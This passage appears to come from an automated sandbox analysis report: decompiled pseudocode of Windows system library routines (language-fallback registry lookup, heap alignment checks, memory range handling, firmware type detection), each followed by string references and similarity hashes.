                                                                                          					E01B7BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                          					_v36 = 0x18;
                                                                                          					_v28 =  &_v44;
                                                                                          					_v64 = 0;
                                                                                          					_push( &_v36);
                                                                                          					_push(0x20019);
                                                                                          					_v32 = 0;
                                                                                          					_push( &_v64);
                                                                                          					_v24 = 0x40;
                                                                                          					_v20 = 0;
                                                                                          					_v16 = 0;
                                                                                          					_t97 = E01B79600();
                                                                                          					if(_t97 < 0) {
                                                                                          						goto L6;
                                                                                          					}
                                                                                          					E01B7BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                          					_push(0);
                                                                                          					_v48 = 4;
                                                                                          					_t97 = L01B3F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                          					if(_t97 >= 0) {
                                                                                          						if(_v52 != 1) {
                                                                                          							L17:
                                                                                          							_t97 = 0xc0000001;
                                                                                          							goto L6;
                                                                                          						}
                                                                                          						_t59 =  *_t78 & 0x0000ffff;
                                                                                          						_t94 = _t78;
                                                                                          						_t83 = _t59;
                                                                                          						if(_t59 == 0) {
                                                                                          							L19:
                                                                                          							if(_t83 == 0) {
                                                                                          								L23:
                                                                                          								E01B7BB40(_t83, _t102 + 0x24, _t78);
                                                                                          								if(L01B443C0( &_v48,  &_v64) == 0) {
                                                                                          									goto L17;
                                                                                          								}
                                                                                          								_t84 = _v48;
                                                                                          								 *_v48 = _v56;
                                                                                          								if( *_t94 != 0) {
                                                                                          									E01B7BB40(_t84, _t102 + 0x24, _t94);
                                                                                          									if(L01B443C0( &_v48,  &_v64) != 0) {
                                                                                          										 *_a4 = _v56;
                                                                                          									} else {
                                                                                          										_t97 = 0xc0000001;
                                                                                          										 *_v48 = 0;
                                                                                          									}
                                                                                          								}
                                                                                          								goto L6;
                                                                                          							}
                                                                                          							_t83 = _t83 & 0x0000ffff;
                                                                                          							while(_t83 == 0x20) {
                                                                                          								_t94 =  &(_t94[1]);
                                                                                          								_t74 =  *_t94 & 0x0000ffff;
                                                                                          								_t83 = _t74;
                                                                                          								if(_t74 != 0) {
                                                                                          									continue;
                                                                                          								}
                                                                                          								goto L23;
                                                                                          							}
                                                                                          							goto L23;
                                                                                          						} else {
                                                                                          							goto L14;
                                                                                          						}
                                                                                          						while(1) {
                                                                                          							L14:
                                                                                          							_t27 =  &(_t94[1]); // 0x2
                                                                                          							_t75 = _t27;
                                                                                          							if(_t83 == 0x2c) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t94 = _t75;
                                                                                          							_t76 =  *_t94 & 0x0000ffff;
                                                                                          							_t83 = _t76;
                                                                                          							if(_t76 != 0) {
                                                                                          								continue;
                                                                                          							}
                                                                                          							goto L23;
                                                                                          						}
                                                                                          						 *_t94 = 0;
                                                                                          						_t94 = _t75;
                                                                                          						_t83 =  *_t75 & 0x0000ffff;
                                                                                          						goto L19;
                                                                                          					}
                                                                                          				}
                                                                                          			}


                                                                                          Strings
                                                                                          • InstallLanguageFallback, xrefs: 01B3E6DB
                                                                                          • @, xrefs: 01B3E6C0
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01B3E68C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                          • API String ID: 0-1757540487
                                                                                          • Opcode ID: b3ed41347be55d7d2c4e77577d89c6d4849451b84ae7ebd4af196630d162d2a0
                                                                                          • Instruction ID: 32dff74b6c9c9356eecc25e333bec1679344e35df6466bbdfe825570f8944c11
                                                                                          • Opcode Fuzzy Hash: b3ed41347be55d7d2c4e77577d89c6d4849451b84ae7ebd4af196630d162d2a0
                                                                                          • Instruction Fuzzy Hash: 9551A0726043469BDF2ADF28C480A6BB7E8EF88654F4509BEF985D7340E734D905C7A2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 60%
                                                                                          			E01B5B8E4(unsigned int __edx) {
                                                                                          				void* __ecx;
                                                                                          				void* __edi;
                                                                                          				intOrPtr* _t16;
                                                                                          				intOrPtr _t18;
                                                                                          				void* _t27;
                                                                                          				void* _t28;
                                                                                          				unsigned int _t30;
                                                                                          				intOrPtr* _t31;
                                                                                          				unsigned int _t38;
                                                                                          				void* _t39;
                                                                                          				unsigned int _t40;
                                                                                          
                                                                                          				_t40 = __edx;
                                                                                          				_t39 = _t28;
                                                                                          				if( *0x1c28748 >= 1) {
                                                                                          					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                                          					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                                          						_t18 =  *[fs:0x30];
                                                                                          						__eflags =  *(_t18 + 0xc);
                                                                                          						if( *(_t18 + 0xc) == 0) {
                                                                                          							_push("HEAP: ");
                                                                                          							E01B3B150();
                                                                                          						} else {
                                                                                          							E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          						}
                                                                                          						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                                          						E01B3B150();
                                                                                          						__eflags =  *0x1c27bc8;
                                                                                          						if(__eflags == 0) {
                                                                                          							E01BF2073(_t27, 1, _t39, __eflags);
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				_t38 =  *(_t39 + 0xb8);
                                                                                          				if(_t38 != 0) {
                                                                                          					_t13 = _t40 >> 0xc;
                                                                                          					__eflags = _t13;
                                                                                          					while(1) {
                                                                                          						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                                          						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                                          							break;
                                                                                          						}
                                                                                          						_t30 =  *_t38;
                                                                                          						__eflags = _t30;
                                                                                          						if(_t30 != 0) {
                                                                                          							_t38 = _t30;
                                                                                          							continue;
                                                                                          						}
                                                                                          						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                          						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                          						break;
                                                                                          					}
                                                                                          					return E01B5AB40(_t39, _t38, 0, _t13, _t40);
                                                                                          				} else {
                                                                                          					_t31 = _t39 + 0x8c;
                                                                                          					_t16 =  *_t31;
                                                                                          					while(_t31 != _t16) {
                                                                                          						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                                          						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                                          							return _t16;
                                                                                          						}
                                                                                          						_t16 =  *_t16;
                                                                                          					}
                                                                                          					return _t31;
                                                                                          				}
                                                                                          			}


                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          • Opcode ID: d76e7c47ab8573e07cc075be9820dc66c619723193dd88182ddd719ef81ecb89
                                                                                          • Instruction ID: d44fc42b93dca2053153a3a038b19fc96806777a1807d07ec2aedb9a05671b60
                                                                                          • Opcode Fuzzy Hash: d76e7c47ab8573e07cc075be9820dc66c619723193dd88182ddd719ef81ecb89
                                                                                          • Instruction Fuzzy Hash: 5C11E6313145029FDB6DDB1AC684F35B7B6EF90620F1481EDE80ACB255E770D844C741
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 60%
                                                                                          			E01BFE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                          				signed int _v20;
                                                                                          				char _v24;
                                                                                          				signed int _v40;
                                                                                          				char _v44;
                                                                                          				intOrPtr _v48;
                                                                                          				signed int _v52;
                                                                                          				unsigned int _v56;
                                                                                          				char _v60;
                                                                                          				signed int _v64;
                                                                                          				char _v68;
                                                                                          				signed int _v72;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				char _t87;
                                                                                          				signed int _t90;
                                                                                          				signed int _t94;
                                                                                          				signed int _t100;
                                                                                          				intOrPtr* _t113;
                                                                                          				signed int _t122;
                                                                                          				void* _t132;
                                                                                          				void* _t135;
                                                                                          				signed int _t139;
                                                                                          				signed int* _t141;
                                                                                          				signed int _t146;
                                                                                          				signed int _t147;
                                                                                          				void* _t153;
                                                                                          				signed int _t155;
                                                                                          				signed int _t159;
                                                                                          				char _t166;
                                                                                          				void* _t172;
                                                                                          				void* _t176;
                                                                                          				signed int _t177;
                                                                                          				intOrPtr* _t179;
                                                                                          
                                                                                          				_t179 = __ecx;
                                                                                          				_v48 = __edx;
                                                                                          				_v68 = 0;
                                                                                          				_v72 = 0;
                                                                                          				_push(__ecx[1]);
                                                                                          				_push( *__ecx);
                                                                                          				_push(0);
                                                                                          				_t153 = 0x14;
                                                                                          				_t135 = _t153;
                                                                                          				_t132 = E01BFBBBB(_t135, _t153);
                                                                                          				if(_t132 == 0) {
                                                                                          					_t166 = _v68;
                                                                                          					goto L43;
                                                                                          				} else {
                                                                                          					_t155 = 0;
                                                                                          					_v52 = 0;
                                                                                          					asm("stosd");
                                                                                          					asm("stosd");
                                                                                          					asm("stosd");
                                                                                          					asm("stosd");
                                                                                          					asm("stosd");
                                                                                          					_v56 = __ecx[1];
                                                                                          					if( *__ecx >> 8 < 2) {
                                                                                          						_t155 = 1;
                                                                                          						_v52 = 1;
                                                                                          					}
                                                                                          					_t139 = _a4;
                                                                                          					_t87 = (_t155 << 0xc) + _t139;
                                                                                          					_v60 = _t87;
                                                                                          					if(_t87 < _t139) {
                                                                                          						L11:
                                                                                          						_t166 = _v68;
                                                                                          						L12:
                                                                                          						if(_t132 != 0) {
                                                                                          							E01BFBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                          						}
                                                                                          						L43:
                                                                                          						if(_v72 != 0) {
                                                                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                          							_push( *_t179);
                                                                                          							_push(0x8000);
                                                                                          							E01BFAFDE( &_v72,  &_v60);
                                                                                          						}
                                                                                          						L46:
                                                                                          						return _t166;
                                                                                          					}
                                                                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                          					asm("sbb edi, edi");
                                                                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                          					if(_t90 != 0) {
                                                                                          						_push(0);
                                                                                          						_push(0x14);
                                                                                          						_push( &_v44);
                                                                                          						_push(3);
                                                                                          						_push(_t179);
                                                                                          						_push(0xffffffff);
                                                                                          						if(E01B79730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                          							_push(_t139);
                                                                                          							E01BFA80D(_t179, 1, _v40, 0);
                                                                                          							_t172 = 4;
                                                                                          						}
                                                                                          					}
                                                                                          					_t141 =  &_v72;
                                                                                          					if(E01BFA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                          						_v64 = _a4;
                                                                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                          						asm("sbb edi, edi");
                                                                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                          						if(_t94 != 0) {
                                                                                          							_push(0);
                                                                                          							_push(0x14);
                                                                                          							_push( &_v24);
                                                                                          							_push(3);
                                                                                          							_push(_t179);
                                                                                          							_push(0xffffffff);
                                                                                          							if(E01B79730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                          								_push(_t141);
                                                                                          								E01BFA80D(_t179, 1, _v20, 0);
                                                                                          								_t176 = 4;
                                                                                          							}
                                                                                          						}
                                                                                          						if(E01BFA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                          							goto L11;
                                                                                          						} else {
                                                                                          							_t177 = _v64;
                                                                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                          							_t100 = _v52 + _v52;
                                                                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                          							 *(_t132 + 0x10) = _t146;
                                                                                          							asm("bsf eax, [esp+0x18]");
                                                                                          							_v52 = _t100;
                                                                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                          							_t47 =  &_a8;
                                                                                          							 *_t47 = _a8 & 0x00000001;
                                                                                          							if( *_t47 == 0) {
                                                                                          								E01B52280(_t179 + 0x30, _t179 + 0x30);
                                                                                          							}
                                                                                          							_t147 =  *(_t179 + 0x34);
                                                                                          							_t159 =  *(_t179 + 0x38) & 1;
                                                                                          							_v68 = 0;
                                                                                          							if(_t147 == 0) {
                                                                                          								L35:
                                                                                          								E01B4B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                          								if(_a8 == 0) {
                                                                                          									E01B4FFB0(_t132, _t177, _t179 + 0x30);
                                                                                          								}
                                                                                          								asm("lock xadd [eax], ecx");
                                                                                          								asm("lock xadd [eax], edx");
                                                                                          								_t132 = 0;
                                                                                          								_v72 = _v72 & 0;
                                                                                          								_v68 = _v72;
                                                                                          								if(E01B57D50() == 0) {
                                                                                          									_t113 = 0x7ffe0388;
                                                                                          								} else {
                                                                                          									_t177 = _v64;
                                                                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                          								}
                                                                                          								if( *_t113 == _t132) {
                                                                                          									_t166 = _v68;
                                                                                          									goto L46;
                                                                                          								} else {
                                                                                          									_t166 = _v68;
                                                                                          									E01BEFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                          									goto L12;
                                                                                          								}
                                                                                          							} else {
                                                                                          								L23:
                                                                                          								while(1) {
                                                                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                          										_t122 =  *_t147;
                                                                                          										if(_t159 == 0) {
                                                                                          											L32:
                                                                                          											if(_t122 == 0) {
                                                                                          												L34:
                                                                                          												_v68 = 0;
                                                                                          												goto L35;
                                                                                          											}
                                                                                          											L33:
                                                                                          											_t147 = _t122;
                                                                                          											continue;
                                                                                          										}
                                                                                          										if(_t122 == 0) {
                                                                                          											goto L34;
                                                                                          										}
                                                                                          										_t122 = _t122 ^ _t147;
                                                                                          										goto L32;
                                                                                          									}
                                                                                          									_t122 =  *(_t147 + 4);
                                                                                          									if(_t159 == 0) {
                                                                                          										L27:
                                                                                          										if(_t122 != 0) {
                                                                                          											goto L33;
                                                                                          										}
                                                                                          										L28:
                                                                                          										_v68 = 1;
                                                                                          										goto L35;
                                                                                          									}
                                                                                          									if(_t122 == 0) {
                                                                                          										goto L28;
                                                                                          									}
                                                                                          									_t122 = _t122 ^ _t147;
                                                                                          									goto L27;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          					_v72 = _v72 & 0x00000000;
                                                                                          					goto L11;
                                                                                          				}
                                                                                          			}




































                                                                                          0x01bfe6fc
                                                                                          0x01bfe700
                                                                                          0x01bfe700
                                                                                          0x01bfe704
                                                                                          0x01bfe70a
                                                                                          0x01bfe70a
                                                                                          0x01bfe713
                                                                                          0x01bfe716
                                                                                          0x01bfe719
                                                                                          0x01bfe720
                                                                                          0x01bfe761
                                                                                          0x01bfe76b
                                                                                          0x01bfe774
                                                                                          0x01bfe77a
                                                                                          0x01bfe77a
                                                                                          0x01bfe78a
                                                                                          0x01bfe791
                                                                                          0x01bfe799
                                                                                          0x01bfe79b
                                                                                          0x01bfe79f
                                                                                          0x01bfe7aa
                                                                                          0x01bfe7c0
                                                                                          0x01bfe7ac
                                                                                          0x01bfe7b2
                                                                                          0x01bfe7b9
                                                                                          0x01bfe7b9
                                                                                          0x01bfe7c7
                                                                                          0x01bfe806
                                                                                          0x00000000
                                                                                          0x01bfe7c9
                                                                                          0x01bfe7d1
                                                                                          0x01bfe7d8
                                                                                          0x00000000
                                                                                          0x01bfe7d8
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bfe722
                                                                                          0x01bfe72e
                                                                                          0x01bfe748
                                                                                          0x01bfe74c
                                                                                          0x01bfe754
                                                                                          0x01bfe756
                                                                                          0x01bfe75c
                                                                                          0x01bfe75c
                                                                                          0x00000000
                                                                                          0x01bfe75c
                                                                                          0x01bfe758
                                                                                          0x01bfe758
                                                                                          0x00000000
                                                                                          0x01bfe758
                                                                                          0x01bfe750
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bfe752
                                                                                          0x00000000
                                                                                          0x01bfe752
                                                                                          0x01bfe730
                                                                                          0x01bfe735
                                                                                          0x01bfe73d
                                                                                          0x01bfe73f
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bfe741
                                                                                          0x01bfe741
                                                                                          0x00000000
                                                                                          0x01bfe741
                                                                                          0x01bfe739
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bfe73b
                                                                                          0x00000000
                                                                                          0x01bfe73b
                                                                                          0x01bfe722
                                                                                          0x01bfe720
                                                                                          0x01bfe6b0
                                                                                          0x01bfe618
                                                                                          0x00000000
                                                                                          0x01bfe618

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$`
                                                                                          • API String ID: 0-197956300
                                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                          • Instruction ID: 9d68618fb105b923672ba42d8c1de7c20a4adf5e46d6e90c5f0483520dde0c66
                                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                          • Instruction Fuzzy Hash: 889171312043429FEB28CE29C945B2BBBE5EF84714F15896DF795CB290E774E908CB52
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 77%
                                                                                          			E01BB51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                          				signed short* _t63;
                                                                                          				signed int _t64;
                                                                                          				signed int _t65;
                                                                                          				signed int _t67;
                                                                                          				intOrPtr _t74;
                                                                                          				intOrPtr _t84;
                                                                                          				intOrPtr _t88;
                                                                                          				intOrPtr _t94;
                                                                                          				void* _t100;
                                                                                          				void* _t103;
                                                                                          				intOrPtr _t105;
                                                                                          				signed int _t106;
                                                                                          				short* _t108;
                                                                                          				signed int _t110;
                                                                                          				signed int _t113;
                                                                                          				signed int* _t115;
                                                                                          				signed short* _t117;
                                                                                          				void* _t118;
                                                                                          				void* _t119;
                                                                                          
                                                                                          				_push(0x80);
                                                                                          				_push(0x1c105f0);
                                                                                          				E01B8D0E8(__ebx, __edi, __esi);
                                                                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                          				_t115 =  *(_t118 + 0xc);
                                                                                          				 *(_t118 - 0x7c) = _t115;
                                                                                          				 *((char*)(_t118 - 0x65)) = 0;
                                                                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                          				_t113 = 0;
                                                                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                          				_t100 = __ecx;
                                                                                          				if(_t100 == 0) {
                                                                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                          					E01B4EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                          					 *((char*)(_t118 - 0x65)) = 1;
                                                                                          					_t63 =  *(_t118 - 0x90);
                                                                                          					_t101 = _t63[2];
                                                                                          					_t64 =  *_t63 & 0x0000ffff;
                                                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                          					L20:
                                                                                          					_t65 = _t64 >> 1;
                                                                                          					L21:
                                                                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                          					if(_t108 == 0) {
                                                                                          						L27:
                                                                                          						 *_t115 = _t65 + 1;
                                                                                          						_t67 = 0xc0000023;
                                                                                          						L28:
                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                          						L29:
                                                                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                          						E01BB53CA(0);
                                                                                          						return E01B8D130(0, _t113, _t115);
                                                                                          					}
                                                                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                          							 *_t108 = 0;
                                                                                          						}
                                                                                          						goto L27;
                                                                                          					}
                                                                                          					 *_t115 = _t65;
                                                                                          					_t115 = _t65 + _t65;
                                                                                          					E01B7F3E0(_t108, _t101, _t115);
                                                                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                          					_t67 = 0;
                                                                                          					goto L28;
                                                                                          				}
                                                                                          				_t103 = _t100 - 1;
                                                                                          				if(_t103 == 0) {
                                                                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                          					_t74 = E01B53690(1, _t117, 0x1b11810, _t118 - 0x74);
                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                          					_t101 = _t117[2];
                                                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                          					if(_t74 < 0) {
                                                                                          						_t64 =  *_t117 & 0x0000ffff;
                                                                                          						_t115 =  *(_t118 - 0x7c);
                                                                                          						goto L20;
                                                                                          					}
                                                                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                          					_t115 =  *(_t118 - 0x7c);
                                                                                          					goto L21;
                                                                                          				}
                                                                                          				if(_t103 == 1) {
                                                                                          					_t105 = 4;
                                                                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                          					_push(_t118 - 0x70);
                                                                                          					_push(0);
                                                                                          					_push(0);
                                                                                          					_push(_t105);
                                                                                          					_push(_t118 - 0x78);
                                                                                          					_push(0x6b);
                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = E01B7AA90();
                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                          					_t113 = L01B54620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                          					if(_t113 != 0) {
                                                                                          						_push(_t118 - 0x70);
                                                                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                          						_push(_t113);
                                                                                          						_push(4);
                                                                                          						_push(_t118 - 0x78);
                                                                                          						_push(0x6b);
                                                                                          						_t84 = E01B7AA90();
                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                          						if(_t84 < 0) {
                                                                                          							goto L29;
                                                                                          						}
                                                                                          						_t110 = 0;
                                                                                          						_t106 = 0;
                                                                                          						while(1) {
                                                                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                          							 *(_t118 - 0x88) = _t106;
                                                                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                          							_t106 = _t106 + 1;
                                                                                          						}
                                                                                          						_t88 = E01BB500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                          						_t119 = _t119 + 0x1c;
                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                          						if(_t88 < 0) {
                                                                                          							goto L29;
                                                                                          						}
                                                                                          						_t101 = _t118 - 0x3c;
                                                                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                          						goto L21;
                                                                                          					}
                                                                                          					_t67 = 0xc0000017;
                                                                                          					goto L28;
                                                                                          				}
                                                                                          				_push(0);
                                                                                          				_push(0x20);
                                                                                          				_push(_t118 - 0x60);
                                                                                          				_push(0x5a);
                                                                                          				_t94 = E01B79860();
                                                                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                          				if(_t94 < 0) {
                                                                                          					goto L29;
                                                                                          				}
                                                                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                          					_t101 = L"Legacy";
                                                                                          					_push(6);
                                                                                          				} else {
                                                                                          					_t101 = L"UEFI";
                                                                                          					_push(4);
                                                                                          				}
                                                                                          				_pop(_t65);
                                                                                          				goto L21;
                                                                                          			}






















                                                                                          0x01bb5379
                                                                                          0x01bb537f
                                                                                          0x01bb538c
                                                                                          0x01bb5390
                                                                                          0x00000000
                                                                                          0x01bb5390
                                                                                          0x01bb51ee
                                                                                          0x01bb51f1
                                                                                          0x01bb5301
                                                                                          0x01bb5310
                                                                                          0x01bb5315
                                                                                          0x01bb5318
                                                                                          0x01bb531b
                                                                                          0x01bb5320
                                                                                          0x01bb532e
                                                                                          0x01bb5331
                                                                                          0x00000000
                                                                                          0x01bb5331
                                                                                          0x01bb5328
                                                                                          0x01bb5329
                                                                                          0x00000000
                                                                                          0x01bb5329
                                                                                          0x01bb51fa
                                                                                          0x01bb5235
                                                                                          0x01bb5236
                                                                                          0x01bb5239
                                                                                          0x01bb523f
                                                                                          0x01bb5240
                                                                                          0x01bb5241
                                                                                          0x01bb5242
                                                                                          0x01bb5246
                                                                                          0x01bb5247
                                                                                          0x01bb524e
                                                                                          0x01bb5251
                                                                                          0x01bb5267
                                                                                          0x01bb5269
                                                                                          0x01bb526e
                                                                                          0x01bb527d
                                                                                          0x01bb527e
                                                                                          0x01bb5281
                                                                                          0x01bb5282
                                                                                          0x01bb5287
                                                                                          0x01bb5288
                                                                                          0x01bb528a
                                                                                          0x01bb528f
                                                                                          0x01bb5294
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bb529a
                                                                                          0x01bb529c
                                                                                          0x01bb529e
                                                                                          0x01bb529e
                                                                                          0x01bb52a4
                                                                                          0x01bb52b0
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bb52ba
                                                                                          0x01bb52bc
                                                                                          0x01bb52bc
                                                                                          0x01bb52d4
                                                                                          0x01bb52d9
                                                                                          0x01bb52dc
                                                                                          0x01bb52e1
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bb52e7
                                                                                          0x01bb52f4
                                                                                          0x00000000
                                                                                          0x01bb52f4
                                                                                          0x01bb5270
                                                                                          0x00000000
                                                                                          0x01bb5270
                                                                                          0x01bb51fc
                                                                                          0x01bb51fd
                                                                                          0x01bb5202
                                                                                          0x01bb5203
                                                                                          0x01bb5205
                                                                                          0x01bb520a
                                                                                          0x01bb520f
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01bb521b
                                                                                          0x01bb5226
                                                                                          0x01bb522b
                                                                                          0x01bb521d
                                                                                          0x01bb521d
                                                                                          0x01bb5222
                                                                                          0x01bb5222
                                                                                          0x01bb522d
                                                                                          0x00000000

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          • Opcode ID: 5bc7f30eb72a9d95ba34a7e8a36b5775100868c0c761ee3a722a49f0b0f892bd
                                                                                          • Instruction ID: 877fd1e244f4849cc89cc6a40178fa15314d9fa7f3edab53607c562f62d98c46
                                                                                          • Opcode Fuzzy Hash: 5bc7f30eb72a9d95ba34a7e8a36b5775100868c0c761ee3a722a49f0b0f892bd
                                                                                          • Instruction Fuzzy Hash: F6517C71A016099FDB28DFA8C8C0ABDBBF8FB48700F1440ADE61AEB651D7B19900CB11
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 78%
                                                                                          			E01B3B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                          				signed int _t65;
                                                                                          				signed short _t69;
                                                                                          				intOrPtr _t70;
                                                                                          				signed short _t85;
                                                                                          				void* _t86;
                                                                                          				signed short _t89;
                                                                                          				signed short _t91;
                                                                                          				intOrPtr _t92;
                                                                                          				intOrPtr _t97;
                                                                                          				intOrPtr* _t98;
                                                                                          				signed short _t99;
                                                                                          				signed short _t101;
                                                                                          				void* _t102;
                                                                                          				char* _t103;
                                                                                          				signed short _t104;
                                                                                          				intOrPtr* _t110;
                                                                                          				void* _t111;
                                                                                          				void* _t114;
                                                                                          				intOrPtr* _t115;
                                                                                          
                                                                                          				_t109 = __esi;
                                                                                          				_t108 = __edi;
                                                                                          				_t106 = __edx;
                                                                                          				_t95 = __ebx;
                                                                                          				_push(0x90);
                                                                                          				_push(0x1c0f7a8);
